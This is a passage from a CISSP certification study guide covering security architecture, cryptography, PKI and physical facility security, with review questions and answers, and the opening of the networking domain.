deletion” or “wiping”), degaussing with magnets and physical destruction. Formatting a volume does not render data unrecoverable, and neither does data encryption (if somebody had the decryption key, the data is at risk). 3. Answer: A Explanation: In this scenario, your goal is to evaluate the solutions presented, not the vendors, so you should use a standards selection process. This will enable the team to select the solution that best fits the organization’s needs. While a vendor selection process is part of engaging with a vendor, this scenario specifically calls for the evaluation of the solutions. 29 Domain 3. Security Architecture and Engineering This domain is more technical than some of the others. If you already work in a security engineering role, then you have an advantage in this domain. If you don’t, allocate extra time to be sure you have a firm understanding of the topics. Note that some of the concepts in this domain are foundational in nature, so you’ll find aspects of them throughout the other domains. 3.1 Implement and manage engineering processes using secure design principles When managing projects or processes, you need to use proven principles to ensure you end up with a functional solution that meets or exceed the requirements, stays within the budget, and does not introduce unnecessary risk to the organization. The following are the high-level phases of a project:  Idea or concept. You might want to create an app or a new web site, or deploy a new on-premises virtualized infrastructure. At this stage, the priority is to stay at a high level, without details. You need to document what the idea or concept will amount to. For example, you want to develop an app that will enable customers to schedule appointments, manage their accounts and pay their bills.  Requirements. It is important to document all the requirements from the various business units and stakeholders. Establish both functional requirements (for example, the app will enable users to pay bills by taking a picture of their credit card) and non-functional requirements (for example, the app must be PCI DSS compliant).  Design. Next, establish a design to meet the requirements. A design cannot be completed without all requirements. For example, to know how robust an infrastructure to design, you need to know how many users need to use the system simultaneously. Part of the design phase must be focused around security. For example, you must account for the principle of least privilege, fail-safe defaults and segregation of duties.  Develop and implement in a non-production environment. In this phase, you create and deploy hardware, software and code as applicable for your project into a non-production environment (typically a development environment).  Initial testing. Teams test the non-production implementation. The goal is to find and eliminate major bugs, missing functionality and other issues. It is common to go back to the previous phase to make necessary changes. Occasionally, you might have to even go back to the design phase.  Implementation. Once all requirements have been met and the team is satisfied, you can move to a quality assurance (QA) environment. There, you’ll repeat the “develop and implement” phase and the testing phase. Then you will move the app or service to the production environment.  Support. After you implement your solution, you must operationalize it. Support teams and escalation paths should have been identified as part of the design. There are many other phases, such as user training, communication and compliance testing. Remember that skipping any of these steps reduces the chances of having a successful and secure solution. 30 3.2 Understand the fundamental concepts of security models Security models enable people to access only the data classified for their clearance level. There are many models. We will cover Bell-LaPadula and Biba, both of which use mathematical formulas. You don’t need to know the formulas or other details for the exam, but you should be familiar with the models and their pros and cons.  Bell-LaPadula. This model was established in 1973 for the United States Air Force. It focuses on confidentiality. The goal is to ensure that information is exposed only to those with the right level of classification. For example, if you have a Secret clearance, you can read data classified as Secret, but not Top Secret data. This model has a “no read up” (users with a lower clearance cannot read data classified at a higher level) and a “no write down” (users with a clearance higher than the data cannot modify that data) methodology. Notice that Bell-LaPadula doesn’t address “write up,” which could enable a user with a lower clearance to write up to data classified at a higher level. To address this complexity, this model is often enhanced with other models that focus on integrity. Another downside to this model is that it doesn’t account for covert channels. A covert channel is a way of secretly sending data across an existing connection. For example, you can send a single letter inside the IP identification header. Sending a large message is slow. But often such communication isn’t monitored or caught.  Biba. Released in 1977, this model was created to supplement Bell-LaPadula. Its focus is on integrity. The methodology is “no read down” (for example, users with a Top Secret clearance can’t read data classified as Secret) and “no write up” (for example, a user with a Secret clearance can’t write data to files classified as Top Secret). By combining it with Bell-LaPadula, you get both confidentiality and integrity. There are other models; for example, the Clark-Wilson model also focuses on integrity. 3.3 Select controls based upon systems security requirements For this section of the exam, you should be familiar with the Common Criteria for Information Technology Security Evaluation. The Common Criteria (CC) unifies older standards (CTCPEC, ITSEC and TCSEC) to provide a standard to evaluate systems against. CC evaluations are focused on security-related systems and products. The important concepts for this section are:  To perform an evaluation, you need to select the target of evaluation (TOE). This might be a firewall or an antimalware app.  The evaluation process will look at the protection profile (PP), which is a document that outlines the security needs. A vendor might opt to use a specific protection profile for a particular solution.  The evaluation process will look at the security target (ST), which identifies the security properties for the TOE. The ST is usually published to customers and partners and available to internal staff.  The evaluation will attempt to gauge the confidence level of a security feature. Security assurance requirements (SARs) are documented and based on the development of the solution. Key actions during development and testing should be captured along the way. An evaluation assurance level (EAL) is a numerical rating used to assess the rigor of an evaluation. The scale is EAL 1 (cheap and easy) to EAL7 (expensive and complex). 31 3.4 Understand the security capabilities of information systems This section focuses on the capabilities of specific computing components. Thus, it isn’t a section where hands-on experience can give you an advantage. Some of these components are discussed in other sections, sometimes in more detail. Ensure that you are familiar with all the information in this section. For any topic in this section that is new to you, plan to dive deeper into the topic outside of this study guide.  Memory protection. At any given time, a computing device might be running multiple applications and services. Each one occupies a segment of memory. The goal of memory protection is to prevent one application or service from impacting another application or service. There are two popular memory protection methods:  Process isolation. Virtually all modern operating systems provide process isolation, which prevents one process from impacting another process.  Hardware segmentation. Hardware isolation is stricter than process isolation; the operating system maps processes to dedicated memory locations.  Virtualization. In virtualized environments, there are special considerations to maximize security. The goal is to prevent attacks on the hypervisors and ensure that a compromise of one VM does not result in a compromise of all VMs on the host. Many organizations choose to deploy their high-security VMs to dedicated high-security hosts. In some cases, organizations have teams (such as the team responsible for identity and access management) manage their own virtualization environment to minimize the chances of an internal attack.  Trusted Platform Module. A Trusted Platform Module (TPM) is a cryptographic chip that is sometimes included with a client computer or server. A TPM expands the capabilities of the computer by offering hardware-based cryptographic operations. Many security products and encryption solutions require a TPM. For example, BitLocker Drive Encryption (a built-in volume encryption solution) requires a TPM to maximize the security of the encryption.  Interfaces. In this context, an interface is the method by which two or more systems communicate. For example, when an LDAP client communicates with an LDAP directory server, it uses an interface. When a VPN client connects to a VPN server, it uses an interface. For this section, you need to be aware of the security capabilities of interfaces. There are a couple of common capabilities across most interfaces:  Encryption. When you encrypt communications, a client and server can communicate privately without exposing information over the network. For example, if you use encryption between two email servers, then the SMTP transactions are encrypted and unavailable to attackers (compared to a default SMTP transaction which takes place in plain text). In some cases, an interface (such as LDAP) provides a method (such as LDAPS) for encrypting communication. When an interface doesn’t provide such a capability, then IPsec or another encrypted transport mechanism can be used.  Signing. You can also sign communication, whether or not you encrypt the data. Signing communications tells the receiver, without a doubt, who the sender (client) is. This provides non-repudiation. In a highsecurity environment, you should strive to encrypt and sign all communications, though this isn’t always feasible. 32  Fault tolerance. Fault tolerance is a capability used to keep a system available. In the event of an attack (such as a DoS attack), fault tolerance helps keep a system up and running. Complex attacks can target a system, knowing that the fallback method is an older system or communication method that is susceptible to attack. 3.5 Assess and mitigate the vulnerabilities of security architectures, designs and solution elements This section represents the vulnerabilities present in a plethora of technologies in an environment. You should feel comfortable reviewing an IT environment, spotting the vulnerabilities and proposing solutions to mitigate them. To do this, you need to understand the types of vulnerabilities often present in an environment and be familiar with mitigation options.  Client-based systems. Client computers are the most attacked entry point. An attacker tries to gain access to a client computer, often through a phishing attack. Once a client computer is compromised, the attacker can launch attacks from the client computer, where detection is more difficult compared to attacks originating from the internet. Productivity software (word processors, spreadsheet applications) and browsers are constant sources of vulnerabilities. Even fully patched client computers are at risk due to phishing and social engineering attacks. To mitigate client-based issues, you should run a full suite of security software on each client computer, including antivirus, anti-malware, anti-spyware and a host-based firewall.  Server-based systems. While attackers often target client computer initially, their goal is often gaining access to a server, from which they can gain access to large amounts of data and potentially every other device on the network. To mitigate the risk of server-based attacks (whether attacking a server or attacking from a server), you should patch servers regularly — within days of new patches being released, and even sooner for patches for remote code execution vulnerabilities. In addition, you should use a hardened operating system image for all server builds. Last, you should use a host-based firewall to watch for suspicious traffic going to or from servers.  Database systems. Databases often store a company’s most important and sensitive data, such as credit card transactions, employees’ personally identifiable information, customer lists, and confidential supplier and pricing information. Attackers, even those with low-level access to a database, might try to use inference and aggregation to obtain confidential information. Attackers might also use valid database transactions to work through data using data mining and data analytics.  Cryptographic systems. The goal of a well-implemented cryptographic system is to make a compromise too timeconsuming (such as 5,000 years) or too expensive (such as millions of dollars). Each component has vulnerabilities:  Software. Software is used to encrypt and decrypt data. It can be a standalone application with a graphical interface, or software built into the operating system or other software. As with any software, there are sometimes bugs or other issues, so regular patching is important.  Keys. A key dictates how encryption is applied through an algorithm. A key should remain secret; otherwise, the security of the encrypted data is at risk. Key length is an important consideration. To defend against quick brute-force attacks, you need a long key. Today, a 256-bit key is typically the minimum recommended for symmetric encryption, and a 2048-bit key is typically the minimum recommended for asymmetric encryption. However, the length should be based on your requirements and the sensitivity of the data being handled. 33  Algorithms. There are many algorithms (or ciphers) to choose from. It is a good practice to use an algorithm with a large key space (a key space represents all possible permutations of a key) and a large random key value (a key value is a random value used by an algorithm for the encryption process). Algorithms are not secret, but instead well known.  Protocols. There are different protocols for performing cryptographic functions. Transport Layer Security (TLS) is a very popular protocol used across the internet, such as for banking sites or sites that require encryption. Today, most sites (even Google) use encryption. Other protocols include Kerberos and IPsec.  Industrial Control Systems (ICS). Supervisory control and data acquisition (SCADA) systems are used to control physical devices such as those found in an electrical power plant or factory. SCADA systems are well suited for distributed environments, such as those spread out across continents. Some SCADA systems still rely on legacy or proprietary communications. These communications are at risk, especially as attackers are gaining knowledge of such systems and their vulnerabilities.  Cloud-based systems. Unlike systems on-premises, cloud-based systems are mainly controlled by cloud vendors. You often will not have access to or control of the hardware, software or supporting systems. When working with cloud-based systems, you need to focus your efforts on areas that you can control, such as the network entry and exit points (use firewalls and similar security solutions), encryption (use for all network communication and data at rest), and access control (use a centralized identity access and management system with multi-factor authentication). You should also gather diagnostic and security data from the cloud-based systems and store that information in your security information and event management system. With some cloud vendors, you might be able to configure aspects of the service, such as networking or access. In such scenarios, ensure that your cloud configuration matches or exceeds your on-premises security requirements. In high-security environments, your organization should have a dedicated cloud approach. Last, don't forget to look at the cloud vendors and understand their security strategy and tactics. You should be comfortable with the vendor's approach before you use their cloud services.  Distributed systems. Distributed systems are systems that work together to perform a common task, such as storing and sharing data, computing, or providing a web service. Often, there isn’t centralized management (especially with peer-to-peer implementations). In distributed systems, integrity is sometimes a concern because data and software are spread across various systems, often in different locations. To add to the trouble, there is often replication that is duplicating data across many systems.  Internet of Things (IoT). Like cloud-based systems, you will have limited control over IoT devices. Mostly, you will have control of the configuration and updating. And you should spend extra time understanding both. Keeping IoT devices up to date on software patches is critically important. Without the latest updates, devices are often vulnerable to remote attacks from the internet. This is riskier than internal-only devices. On the configuration side, you should disable remote management and enable secure communication only (such as over HTTPS), at a minimum. As with cloud-based systems, review the IoT vendor to understand their history with reported vulnerabilities, response time to vulnerabilities and overall approach to security. Not all IoT devices are suitable for enterprise networks! 34 3.6 Assess and mitigate vulnerabilities in web-based systems Web-based systems are systems you reach through the internet, often (but not always) through a web browser. Web-based systems are often meant to be public-facing, so they are exposed to the entire internet. This makes them vulnerable to attackers looking for easy targets, such as older and unpatched versions of web server software. There are several areas to review when you assess and mitigate vulnerabilities in web-based systems:  Web server software. The web server software must be running the latest security patches. Running the latest version of the software can provide enhanced (and optional) security features. You need to have logging, auditing and monitoring for your web servers. The goal of these isn’t to prevent attacks but instead to recognize warning signs early, before an attack or as early in the attack as possible. After an attack, the logs can provide critical information about the vulnerability, the date of compromise and sometimes even the identity of the attacker.  Endpoint security. You also need to manage the client side. Clients that visit a compromised web server could become compromised. To minimize the risk of compromise, you need a multi-layered approach that includes a standardized browser configured for high security, web proxy servers to blacklist known bad web servers and track web traffic, host-based firewalls to block suspicious traffic, and anti-malware/anti-spyware/anti-virus software to watch for suspicious activity.  OWASP Top 10. The Open Web Application Security Project (OWASP) publishes a list of the top 10 critical web application security risks. You should read through it and be familiar with these risks. See https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf for more information. Here are two of the most important:  Injection flaws (OWASP Top 10, #1). Injection flaws have been around a long time. Two of the most common are SQL injection attacks and cross-site scripting (XSS) attacks. In an injection attack, an attacker provides invalid input to a web application, which is then processed by an interpreter. For example, an attacker might use special characters in a web-based form to alter how the form is processed (for example, comment out the password check). Input validation can help minimize the chances of an injection attack. But you need more than that. You need to properly test these types of scenarios prior to going live. One common mitigation strategy for SQL injection attacks is using prepared statements and parameterized queries; this enables the database to differentiate between code and data.  XML External Entities / XXE (OWASP Top 10, #4). In this type of attack, the goal is to pass invalid input (containing a reference to an external entity) to an XML parsing application. To minimize the potential for this attack, you can disable document type definitions (DTDs). 3.7 Assess and mitigate vulnerabilities in mobile systems Today, mobile systems such as smartphones and tablets are full-blown computers. You can use them to connect to corporate networks and to produce, consume and share content. Therefore, these devices need to be treated like computers. You need to deploy and maintain security software, such as anti-malware and anti-virus software. You need to use encryption for storing data on the devices and for sending and receiving data, especially with the corporate network. You need to apply your organization’s standards and security policies, when applicable. For example, you need to ensure that the devices are running the latest version of the software and have the latest patches. To deploy and maintain the 35 devices with a secure configuration, you need centralized management software so you can report on vulnerabilities and risk, and manage devices in bulk or with automation. At the device level, you need to require screen locks, strong authentication and encryption. You need to be able to remotely lock and wipe devices in the event a device is lost or stolen. Even with these things in place, you should restrict mobile systems to non-sensitive data, so they can’t read or store PII or other confidential information. 3.8 Assess and mitigate vulnerabilities in embedded devices In addition to managing security for your computing infrastructure and computers, you also should think about other systems that interact with your computing infrastructure. Today, that includes everything from coffee makers to smart white boards to copiers. These devices are becoming more and more connected, and some of them are even IoT devices. While these devices have had computers embedded in them for some time, they used to be standalone devices, not connected to your network, so a compromise was extremely limited and quite rare. Today, you need to consider the following information when managing your embedded devices:  Some devices are configured by default to contact the manufacturer to report health information or diagnostic data. You need to be aware of such communication. Disable it when possible. At a minimum, ensure that the configuration is such that additional information cannot be sent out alongside the expected information.  Some devices, by default, accept remote connections from anywhere. Sometimes the connections are for remote management. You should eliminate remote connectivity options for devices that do not need to be managed remotely.  Many embedded systems and IoT systems are built for convenience, functionality and compatibility — security is often last on the list, so authentication and authorization are sometimes non-existent. Additionally, many systems are small and have limited battery life, so encryption is often not used because it drains the batteries too fast and requires ample CPU power. And your existing systems for managing device security and managing patches are not likely to be compatible with IoT devices, which makes managing software versions and patches difficult. Attackers have already exploited flaws in IoT devices; for example, one company was infected with malware that originated from a coffeemaker. As the number and sophistication of the devices increases, hackers will likely explore this attack vector even more. 3.9 Apply cryptography Cryptography is present in several technologies. Applying cryptography is a big topic that covers several independent technologies. For the exam, be familiar with the high-level concepts around applying cryptography and its related technologies more so than understanding the details of implementing or supporting them. The subtopics below are the key topics outlined for this section. If you are new to cryptography or have limited exposure to it, consider additional sources to dive deeper.  Cryptographic lifecycle (e.g., cryptographic limitations, algorithm/protocol governance). When we think about the lifecycle of technologies, we often think about the hardware and software support, performance and reliability. When it comes to cryptography, things are a bit different: The lifecycle is focused squarely around security. As computing power goes up, the strength of cryptographic algorithms goes down. It is only a matter of 36 time before there is enough computing power to brute-force through existing algorithms with common key sizes. You must think through the effective life of a certificate or certificate template, and of cryptographic systems. Beyond brute force, you have other issues to think through, such as the discovery of a bug or an issue with an algorithm or system. NIST defines the following terms that are commonly used to describe algorithms and key lengths: approved (a specific algorithm is specified as a NIST recommendation or FIPS recommendation), acceptable (algorithm + key length is safe today), deprecated (algorithm and key length is OK to use, but brings some risk), restricted (use of the algorithm and/or key length is deprecated and should be avoided), legacy (the algorithm and/or key length is outdated and should be avoided when possible), and disallowed (algorithm and/or key length is no longer allowed for the indicated use).  Cryptographic methods. This subtopic covers the following three types of encryption. Be sure you know the differences.  Symmetric. Symmetric encryption uses the same key for encryption and decryption. Symmetric encryption is faster than asymmetric encryption because you can use smaller keys for the same level of protection. The downside is that users or systems must find a way to securely share the key and then hope that the key is used only for the specified communication.  Asymmetric. Asymmetric encryption uses different keys for encryption and decryption. Since one is a public key that is available to anybody, this method is sometimes referred to as “public key encryption.” Besides the public key, there is a private key that should remain private and protected. Asymmetric encryption doesn’t have any issues with distributing public keys. While asymmetric encryption is slower, it is best suited for sharing between two or more parties. RSA is one common asymmetric encryption standard.  Elliptic curves. Elliptic Curve Cryptography (ECC) is a newer implementation of asymmetric encryption. The primary benefit is that you can use smaller keys, which enhances performance.  Public key infrastructure (PKI). A PKI is a foundational technology for applying cryptography. A PKI issues certificates to computing devices and users, enabling them to apply cryptography (for example, send encrypted email messages, encrypt web sites, or use IPsec to encrypt data communications). There are multiple vendors providing PKI services. You can run a PKI privately and solely for your own organization, you can acquire certificates from a trusted third-party provider, or you can do both, which is very common. A PKI is made up of certification authorities (CAs) (servers that provide one or more PKI functions, such as providing policies or issuing certificates), certificates (issued to other certification authorities or to devices and users), policies and procedures (such as how the PKI is secured), and templates (a predefined configuration for specific uses, such as a web server template). There are other components and concepts you should know for the exam:  A PKI can have multiple tiers. Having a single tier means you have one or more servers that perform all the functions of a PKI. When you have two tiers, you often have an offline root CA (a server that issues certificates to the issuing CAs but remains offline most of the time) in one tier, and issuing CAs (the servers that issue certificates to computing devices and users) in the other tier. The servers in the second tier are often referred to as intermediate CAs or subordinate CAs. Adding a third tier means you can have CAs that are only responsible for issuing policies (and they represent the second tier in a three-tier hierarchy). In such a scenario, the policy CAs should also remain offline and brought online only as needed. In general, 37 the more tiers, the more security (but proper configuration is critical). The more tiers you have, the more complex and costly the PKI is to build and maintain.  A PKI should have a certificate policy and a certificate practice statement (CSP). A certificate policy documents how your company handles items like requestor identities, the uses of certificates and storage of private keys. A CSP documents the security configuration of your PKI and is usually available to the public.  Besides issuing certificates, a PKI has other duties. For example, your PKI needs to be able to provide certificate revocation information to clients. If an administrator revokes a certificate that has been issued, clients must be able to get that information from your PKI. Another example is the storage of private keys and information about issued certificates. You can store these in a database or a directory.  Key management practices. Remember, key management can be difficult with symmetric encryption but is much simpler with asymmetric encryption. There are several tasks related to key management:  Key creation and distribution. Key creation is self-explanatory. Key distribution is the process of sending a key to a user or system. It must be secure and it must be stored in a secure way on the computing device; often, it is stored in a secured store, such as the Windows certificate store.  Key protection and custody. Keys must be protected. You can use a method called split custody which enables two or more people to share access to a key — for example, with two people, each person can hold half the password to the key.  Key rotation. If you use the same keys forever, you are at risk of having the keys lost or stolen or having your information decrypted. To mitigate these risks, you should retire old keys and implement new ones.  Key destruction. A key can be put in a state of suspension (temporary hold), revocation (revoked with no reinstatement possible), expiration (expired until renewed), or destruction (such as at the end of a lifecycle or after a compromise).  Key escrow and key backup recovery. What happens if you encrypt data on your laptop but then lose your private key (for example, through profile corruption)? Normally, you lose the data. But key escrow enables storage of a key for later recovery. This is useful if a private key is lost or a court case requires escrow pending the outcome of a trial. You also need to have a method to back up and recover keys. Many PKIs offer a backup or recovery method, and you should take advantage of that if requirements call for it.  Digital signatures. Digital signatures are the primary method for providing non-repudiation. By digitally signing a document or email, you are providing proof that you are the sender. Digital signatures are often combined with data encryption to provide confidentiality.  Non-repudiation. For this section, non-repudiation refers to methods to ensure that the origin of data is can be deduced with certainty. The most common method for asserting the source of data is to use digital signatures, which rely on certificates. If User1 sends a signed email to User2, User2 can be sure that the email came from User1. It isn’t foolproof though. For example, if User1 shares his credentials to his computer with User3, then User3 can send an email to User2 purporting to be User1, and User2 wouldn’t have a way to deduce that. It is common to combine non-repudiation with confidentiality (data encryption). 38  Integrity. A hash function implements encryption with a specified algorithm but without a key. It is a one-way function. Unlikely encryption, where you can decrypt what’s been encrypted, hashing isn’t meant to be decrypted in the same way. For example, if you hash the word “hello”, you might end up with “4cd21dba5fb0a60e26e83f2ac1b9e29f1b161e4c1fa7425e73048362938b4814”. When apps are available for download, the install files are often hashed. The hash is provided as part of the download. If the file changes, the hash changes. That way, you can figure out if you have the original install file or a bad or modified file. Hashes are also used for storing passwords, with email and for other purposes. Hashes are susceptible to brute force. If you try to hash every possible word and phrase, eventually you will get the hash value that matches whatever hash you are trying to break. Salting provides extra protection for hashing by adding an extra, usually random, value to the source. Then, the hashing process hashes the original value of the source plus the salt value. For example, if your original source value is “Hello” and your salt value is “12-25-17-07:02:32”, then “hello12-25-17-07:02:32” gets hashed. Salting greatly increased the strength of hashing.  Methods of cryptanalytic attacks. There are several methods to attack cryptography. Each has strengths and weaknesses. The primary methods are:  Brute force. In a brute-force attack, every possible combination is attempted. Eventually, with enough time, the attack will be successful. For example, imagine a game where you have to guess the number between 1 and 1,000 that I chose. A brute-force attack would try all numbers between 1 and 1,000 until it found my number. This is a very simplified version of a brute-force attack, but the key point is that a brute-force attack will eventually be successful, provided it is using the correct key space. For example, if an attempt is made to brute force a password, the key space must include all the characters in the password; if the key space includes only letters but the password includes a number, the attack will fail.  Ciphertext only. In a ciphertext-only attack, you obtain samples of ciphertext (but not any plaintext). If you have enough ciphertext samples, the idea is that you can decrypt the target ciphertext based on the ciphertext samples. Today, such attacks are very difficult.  Known plaintext. In a known plaintext attack, you have an existing plaintext file and the matching ciphertext. The goal is to derive the key. If you derive the key, you can use it to decrypt other ciphertext created by the same key.  Digital rights management. When people think of digital rights management (DRM), they think of protections placed on movies and games. But for the CISSP exam, it is really about protection of data, such as spreadsheets and email messages. Organizations often refer to data protection as enterprise digital rights management (E-DRM) or information rights management (IRM). Several vendors offer solutions to protect data in individual files. The solutions all provide a common set of foundational features:  Restrict viewing of a document to a defined set of people  Restrict editing of a document to a defined set of people  Expire a document (rendering it unreadable after a specified date)  Restrict printing of a document to a defined set of people  Provide portable document protection such that the protection remains with the document no matter where it is stored, how it is stored, or which computing device or user opens it 39 You can use DRM, E-DRM or IRM to protect data for your organization. Many of the solutions also enable you to securely share data with external organizations. Sometimes, this sharing is enabled through federation. Other times, the use of a public cloud provider enables cross-organization sharing. DRM, E-DRM and IRM provide companies with a way to provide confidentiality to sensitive documents. Additionally, some of the solutions enable you to track when and where documents were viewed. Last, some solutions enable you to update the protection of a document (such as removing a previously authorized viewer) even after a document has been sent and shared with external parties. 3.10 Apply security principles to site and facility design This section applies to applying secure principles to data centers, server rooms, network operations centers and offices across an organization’s locations. While some areas must be more secure than others, you must apply secure principles throughout your site to maximize security and reduce risk. Crime Prevention through Environmental Design (CPTED) is a well known set of guidelines for the secure design of buildings and office spaces. CPTED stresses three principles:  Natural surveillance. Natural surveillance enables people to observe what’s going on around the building or campus while going about their day-to-day work. It also eliminates hidden areas, areas of darkness and obstacles such as solid fences. Instead, it stresses low or see-through fencing, extra lighting, and the proper place of doors, windows and walkways to maximize visibility and deter crime.  Territoriality. Territoriality is the sectioning of areas based on the area’s use. For example, you might have a private area in the basement of your building for long-term company storage. It should be clearly designated as private, with signs, different flooring and other visible artifacts. The company’s parking garage should have signs indicating that it is private parking only. People should recognize changes in the design of the space and be aware that they might be moving into a private area.  Access control. Access control is the implementation of impediments to ensure that only authorized people can gain access to a restricted area. For example, you can put a gate at the driveway to the parking lot. For an unmanned server room, you should have a secure door with electronic locks, a security camera and signs indicating that the room is off limits to unauthorized people. The overall goal is to deter unauthorized people from gaining access to a location (or a secure portion of a location), prevent unauthorized people from hiding inside or outside of a location, and prevent unauthorized people from committing attacks against the facility or personnel. There are several smaller activities tied to site and facility design, such as upkeep and maintenance. If your property is run down, unkempt or appears to be in disrepair, it gives attackers the impression that they can do whatever they want on your property. 3.11 Implement site and facility security controls Physical security is a topic that covers all the interior and exterior of company facilities. While the subtopics are focused on the interior, many of the same common techniques are applicable to the exterior too.  Wiring closets. A wiring closet is typically a small room that holds IT hardware. It is common to find telephony and network devices in a wiring closet. Occasionally, you also have a small number of servers in a wiring closet. Access 40 to the wiring closest should be restricted to the people responsible for managing the IT hardware. You should use some type of access control for the door, such as an electronic badge system or electronic combination lock. From a layout perspective, wiring closets should be accessible only in private areas of the building interior; people must pass through a visitor center and a controlled doorway prior to be able to enter a wiring closet.  Server rooms and data centers. A server room is a bigger version of a wiring closet but not nearly as big as a data center. A server room typically houses telephony equipment, network equipment, backup infrastructure and servers. A server room should have the same minimum requirements as a wiring closet. While the room is bigger, it should have only one entry door; if there is a second door, it should be an emergency exit door only. It is common to use door alarms for server rooms: If the door is propped open for more than 30 seconds, the alarm goes off. All attempts to enter the server room without authorization should be logged. After multiple failed attempts, an alert should be generated. Data centers are protected like server rooms, but often with a bit more protection. For example, in some data centers, you might need to use your badge both to enter and to leave, whereas with a server room, it is common to be able to walk out by just opening the door. In a data center, it is common to have one security guard checking visitors in and another guard walking the interior or exterior. Some organizations set time limits for authorized people to remain inside the data center. Inside a data center, you should lock everything possible, such as storage cabinets and IT equipment racks.  Media storage facilities. Media storage facilities often store backup tapes and other media, so they should be protected just like a server room. It is common to have video surveillance too.  Evidence storage. An evidence storage room should be protected like a server room or media storage facility.  Restricted work area. Restricted work areas are used for sensitive operations, such as network operations or security operations. The work area can also be non-IT related, such as a bank vault. Protection should be like a server room, although video surveillance is typically limited to entry and exit points.  Utilities and HVAC. When it comes to utilities such as HVAC, you need to think through the physical controls. For example, a person should not be able to crawl through the vents or ducts to reach a restricted area. For the health of your IT equipment, you should use separate HVAC systems. All utilities should be redundant. While a building full of cubicles might not require a backup HVAC system, a data center does, to prevent IT equipment from overheating and failing. In a high-security environment, the data center should be on a different electrical system than other parts of the building. It is common to use a backup generator just for the data center, whereas the main cubicle and office areas have only emergency lighting.  Environmental issues. Some buildings use water-based sprinklers for fire suppression. In a fire, shut down the electricity before turning on the water sprinklers (this can be automated). Water damage is possible; by having individual sprinklers turn on, you can minimize the water damage to only what is required to put out a fire. Other water issues include flood, a burst pipe or backed up drains. Besides water issues, there are other environmental issues that can create trouble, such as earthquakes, power outages, tornados and wind. These issues should be considered before deciding on a data center site or a backup site. It is a good practice to have your secondary data center far enough away from your primary data center so it is not at risk from any environmental issues affecting the primary data center. For example, you should avoid building your backup data center on the same earthquake fault line as your primary data center, even if they are hundreds of miles away from each other. 41  Fire prevention, detection and suppression. The following key points highlight things to know for this section:  Fire prevention. To prevent fires, you need to deploy the proper equipment, test it and manage it. This includes fire detectors and fire extinguishers. You also need to ensure that workers are trained about what to do if they see a fire and how to properly store combustible material. From a physical perspective, you can use firewalls and fire suppressing doors to slow the advancement of a fire and compartmentalize it.  Fire detection. The goal is to detect a fire as soon as possible. For example, use smoke detectors, fire detectors and other sensors (such as heat sensors).  Fire suppression. You need a way to suppress a fire once a fire breaks out. Having emergency pull levers for employees to pull down if they see a fire can help expedite the suppression response (for example, by automatically calling the fire department when the lever is pulled). You can use water-based firesuppression system, or minimize the chances of destroying IT equipment by choosing non-water fire suppressants, such as foams, powders CO2-based solutions, or an FM-200 system. FM-200 systems replace Halon, which was banned for depleting the ozone layer. FM-200 is more expensive than water sprinklers. 42 Domain 3 Review Questions Read and answer the following questions. If you do not get at least one correct, then spend more time with the subject. Then move on to Domain 4. 1. You are a security consultant tasked with reviewing a company’s security model. The current model has the following characteristics:  It establishes confidentiality such that people cannot read access classified at a higher level than their clearance.  It forbids users with a specific clearance from writing data to a document with a lower clearance level. You note that the current model does not account for somebody with a low clearance level from writing data to a document classified at a higher level than their clearance. You need to implement a model to mitigate this. Which of the following security tenets should the new model focus on? a. Availability b. Governance c. Integrity d. Due diligence e. Due care 2. You are documenting the attempted attacks on your organization’s IT systems. The top type of attack was injection attacks. Which definition should you use to describe an injection attack? e. Overloading a system or network f. Plugging in infected portable hard drives g. Capturing packets on a network h. Providing invalid input i. Intercepting and altering network communications 3. You are designing a public key infrastructure for your organization. The organization has issued the following requirements for the PKI:  Maximize security of the PKI architecture  Maximize the flexibility of the PKI architecture You need to choose a PKI design to meet the requirements. Which design should you choose? a. A two-tier hierarchy with an offline root CA being in the first tier and issuing CAs in the second tier b. A two-tier hierarchy with an online root CA being in the first tier and issuing CAs in the second tier c. A three-tier hierarchy with an offline root CA being in the first tier, offline policy CAs being in the second tier, and issuing CAs being in the third tier d. A three-tier hierarchy with an offline root CA being in the first tier, online policy CAs being in the second tier, and issuing CAs being in the third tier 43 Answers to Domain 3 Review Questions 1. Answer: C Explanation: In this scenario, the existing model focused on confidentiality. To round out the model and meet the goal of preventing “write up,” you need to supplement the existing model with a model that focuses on integrity (such as Biba). Focusing on integrity will ensure that you don’t have “write up” (or “read down” either, although that wasn’t a requirement in this scenario). 2. Answer: D Explanation: An injection attack provides invalid input to an application or web page. The goal is to craft that input so that a backend interpreter either performs an action not intended by the organization (such as running administrative commands) or crashes. Injection attacks are mature and routinely used, so it is important to be aware of them and how to protect against them. 3. Answer: C Explanation: When designing a PKI, keep in mind the basic security tenets — the more tiers, the more security, and the more flexibility. Of course, having more tiers also means more cost and complexity. In this scenario, to maximize security and flexibility, you need to use a three-tier hierarchy with the root CAs and the policy CAs being offline. Offline CAs enhance security. Multiple tiers, especially with the use of policy CAs, enhance flexibility because you can revoke one section of the hierarchy without impacting the other (for example, if one of the issuing CAs had a key compromised). 44 Domain 4. Communication and Network Security Networking can be one of the most complex topics on the CISSP exam. If you are lucky enough to have a network background, then you won’t find this domain difficult. However, if your background doesn’t have much networking, spend extra time in this section and consider diving deep into topics that still don’t make sense after you go through this section. 4.1 Implement secure design principles in network architecture This section addresses the design aspects of networking, focusing on security. While networking’s primary function is to enable communication, security will ensure that the communication is between authorized devices only and the communication is private when needed.  Open System Interconnection (OSI) and Transmission Control Protocol/Internet Protocol (TCP/IP) models. The Open Systems Interconnection (OSI) model is the more common of the two prevailing network models. However, in the context of CISSP, you must also be aware of the TCP/IP model and how it compares to the OSI model. The TCP/IP model uses only four layers, while the OSI model uses seven. The following table summarizes the layers of each model. Layer Number OSI Model TCP/IP Model 7 Application 6 Presentation Applications 5 Session 4 Transport TCP (host to host) 3 Network IP 2 Data link Network access 1 Physical Many people use mnemonics to memorize the OSI layers. One popular mnemonic for the OSI layers is “All People Seem To Need Data Processing.”  Internet Protocol (IP) networking. IP networking is what enables devices to communicate. IP provides the foundation for other protocols to be able to communicate. IP itself is a connectionless protocol. IPv4 is for 32-bit addresses, and IPv6 is for 128-bit addresses. Regardless of which version you use to connect devices, you then typically use TCP or UDP to communicate over IP. TCP is a connection-oriented protocol that provides reliable communication, while UDP is a connectionless protocol that provides best-effort communication. Both protocols use standardized port numbers to enable applications to communicate over the IP network.  Implications of multilayer protocols. Some protocols simultaneously use multiple layers of the OSI or TCP/IP model to communicate, and traverse the layers at different times. The process of traversing theses layers is called encapsulation. For example, when a 